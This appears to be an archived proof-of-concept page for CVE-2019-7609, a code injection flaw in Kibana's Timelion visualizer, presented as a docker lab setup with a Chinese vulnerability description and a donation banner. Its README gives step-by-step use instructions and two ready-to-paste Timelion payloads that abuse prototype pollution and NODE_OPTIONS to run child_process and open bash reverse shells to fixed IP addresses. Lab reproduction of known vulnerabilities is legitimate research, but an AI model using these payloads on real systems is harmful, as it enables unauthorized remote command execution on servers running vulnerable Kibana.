Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-7609 PoC — Elasticsearch Kibana 代码注入漏洞

Source
Associated Vulnerability
Title:Elasticsearch Kibana 代码注入漏洞 (CVE-2019-7609)
Description:Elasticsearch Kibana是荷兰Elasticsearch公司的一套开源的、基于浏览器的分析和搜索Elasticsearch仪表板工具。 Kibana 5.6.15之前版本和6.6.1之前版本中的Timelion visualizer存在安全漏洞。远程攻击者可通过发送请求利用该漏洞执行JavaScript代码并可能以Kibana进程权限执行任意命令。
Description
docker lab setup for kibana-7609
Readme
# CVE-2019-7609

docker lab setup for kibana-7609

Reference : https://github.com/mpgn/CVE-2019-7609


    Open Kibana
    Past one of the following payload into the Timelion visualizer
    Click run
    On the left panel click on Canvas
    Your reverse shell should pop ! :)

    payload by @securityMB

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

    payload by @chybeta

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

File Snapshot

[4.0K] /data/pocs/f93347fe38cb4184034382f299af4660e5af0e60 ├── [ 587] docker-compose.yml └── [ 741] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.